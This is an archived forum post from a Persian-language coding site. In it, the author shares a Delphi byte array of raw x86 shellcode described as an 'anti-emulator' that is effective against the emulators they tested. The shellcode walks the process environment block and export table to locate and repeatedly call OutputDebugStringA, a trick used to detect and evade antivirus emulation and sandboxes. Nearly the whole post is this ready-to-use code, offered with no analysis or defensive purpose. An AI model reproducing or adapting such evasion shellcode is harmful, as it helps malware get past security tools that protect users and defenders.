Parsi Coders

نسخه‌ی کامل: DELPHI OutputDebugStringA Anti Emulator ShellCode
شما در حال مشاهده نسخه آرشیو هستید. برای مشاهده نسخه کامل کلیک کنید.
Again just the Delphi version of my OutputDebugStringA Anti Emulator. Really simple to use and extremely effective against some Emulators that I have tested with.


کد:
var
  arrAntiEmulator:  array[0..149] of Byte = (
    $55,$8B,$EC,$83,$C4,$F8,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,
    $8B,$00,$8B,$40,$18,$89,$45,$FC,$8B,$7D,$FC,$66,$81,$3F,$4D,$5A,$75,$6E,$03,$7F,
    $3C,$81,$3F,$50,$45,$00,$00,$75,$63,$8B,$7F,$78,$03,$7D,$FC,$33,$F6,$8B,$47,$20,
    $03,$45,$FC,$8B,$18,$03,$5D,$FC,$81,$3B,$4F,$75,$74,$70,$75,$09,$81,$7B,$04,$75,
    $74,$44,$65,$74,$09,$83,$C0,$04,$46,$3B,$77,$18,$75,$E1,$33,$C0,$83,$C0,$02,$8B,
    $D6,$F7,$E2,$03,$47,$24,$03,$45,$FC,$0F,$BF,$00,$BA,$04,$00,$00,$00,$F7,$E2,$03,
    $47,$1C,$03,$45,$FC,$8B,$00,$03,$45,$FC,$89,$45,$F8,$8D,$05,$85,$10,$40,$00,$50,
    $FF,$55,$F8,$83,$F8,$00,$75,$F1,$C9,$C3);